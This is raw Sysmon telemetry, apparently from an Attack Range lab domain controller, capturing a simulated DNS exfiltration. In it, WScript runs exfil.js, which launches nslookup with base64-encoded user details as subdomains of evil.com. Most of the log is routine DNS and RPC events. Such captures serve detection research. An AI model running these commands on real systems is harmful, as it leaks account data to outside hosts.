14:21:56.442{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-EE46-000000005F02}3860C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.442{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-EE46-000000005F02}3860C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.442{2E1864BB-1904-629A-EE46-000000005F02}38607656C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-ED46-000000005F02}1736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.426{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-EE46-000000005F02}3860C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.426{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.426{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.426{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.426{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.426{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-ED46-000000005F02}1736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.426{2E1864BB-18E0-629A-6742-000000005F02}39767232C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-ED46-000000005F02}1736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.430{2E1864BB-1904-629A-ED46-000000005F02}1736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljutbqc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.426{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlisogkz.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.389{2E1864BB-1904-629A-EB46-000000005F02}48325208C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-EC46-000000005F02}7300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.389{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.389{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.389{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.389{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.389{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-EC46-000000005F02}7300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.389{2E1864BB-1904-629A-EA46-000000005F02}71527912C:\Windows\system32\cmd.exe{2E1864BB-1904-629A-EC46-000000005F02}7300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.397{2E1864BB-1904-629A-EC46-000000005F02}7300C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-EA46-000000005F02}7152C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlisogkz.tmp 2>&1 354300x8000000000000000217166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.969{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51456- 354300x8000000000000000217165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.968{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51455- 354300x8000000000000000217164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.968{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51455- 354300x8000000000000000217163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.968{00000000-0000-0000-0000-000000000000}2328<unknown process>-udptruefalse127.0.0.1-51455-false127.0.0.1-53domain 354300x8000000000000000217162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.968{00000000-0000-0000-0000-000000000000}2328<unknown process>-udpfalsefalse127.0.0.1-51454-false127.0.0.1-53domain 354300x8000000000000000217161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.968{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51454- 354300x8000000000000000217160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.967{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51454- 354300x8000000000000000217159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.804{00000000-0000-0000-0000-000000000000}7920<unknown process>-udpfalsefalse127.0.0.1-51453-false127.0.0.1-53domain 354300x8000000000000000217158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.804{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51453- 354300x8000000000000000217157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.804{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51453- 354300x8000000000000000217156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.804{00000000-0000-0000-0000-000000000000}7920<unknown process>-udptruefalse127.0.0.1-51453-false127.0.0.1-53domain 354300x8000000000000000217155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.804{00000000-0000-0000-0000-000000000000}7920<unknown process>-udpfalsefalse127.0.0.1-51452-false127.0.0.1-53domain 354300x8000000000000000217154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.804{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51452- 354300x8000000000000000217153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.804{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51452- 354300x8000000000000000217152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.804{00000000-0000-0000-0000-000000000000}7920<unknown process>-udptruefalse127.0.0.1-51452-false127.0.0.1-53domain 354300x8000000000000000217151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.803{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51451- 354300x8000000000000000217150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.803{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51451- 354300x8000000000000000217149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.769{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56430-false10.0.1.12-8000- 354300x8000000000000000217148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.628{00000000-0000-0000-0000-000000000000}2848<unknown process>-udpfalsefalse127.0.0.1-51450-false127.0.0.1-53domain 354300x8000000000000000217147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.628{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51450- 354300x8000000000000000217146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.627{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51450- 354300x8000000000000000217145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.627{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51449- 354300x8000000000000000217144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.627{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51449- 354300x8000000000000000217143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.627{00000000-0000-0000-0000-000000000000}2848<unknown process>-udptruefalse127.0.0.1-51449-false127.0.0.1-53domain 354300x8000000000000000217142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.626{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51448- 354300x8000000000000000217141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.626{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51448- 354300x8000000000000000217140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.626{00000000-0000-0000-0000-000000000000}2848<unknown process>-udptruefalse127.0.0.1-51448-false127.0.0.1-53domain 354300x8000000000000000217139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.492{00000000-0000-0000-0000-000000000000}7340<unknown process>-udpfalsefalse127.0.0.1-51447-false127.0.0.1-53domain 354300x8000000000000000217138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.492{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51447- 354300x8000000000000000217137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.492{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51447- 354300x8000000000000000217136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.492{00000000-0000-0000-0000-000000000000}7340<unknown process>-udptruefalse127.0.0.1-51447-false127.0.0.1-53domain 354300x8000000000000000217135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.492{00000000-0000-0000-0000-000000000000}7340<unknown process>-udpfalsefalse127.0.0.1-51446-false127.0.0.1-53domain 354300x8000000000000000217134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.492{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51446- 354300x8000000000000000217133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.492{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51446- 354300x8000000000000000217132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.492{00000000-0000-0000-0000-000000000000}7340<unknown process>-udptruefalse127.0.0.1-51446-false127.0.0.1-53domain 354300x8000000000000000217131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.490{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51445- 354300x8000000000000000217130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.490{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51445- 354300x8000000000000000217129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.490{00000000-0000-0000-0000-000000000000}7340<unknown process>-udptruefalse127.0.0.1-51445-false127.0.0.1-53domain 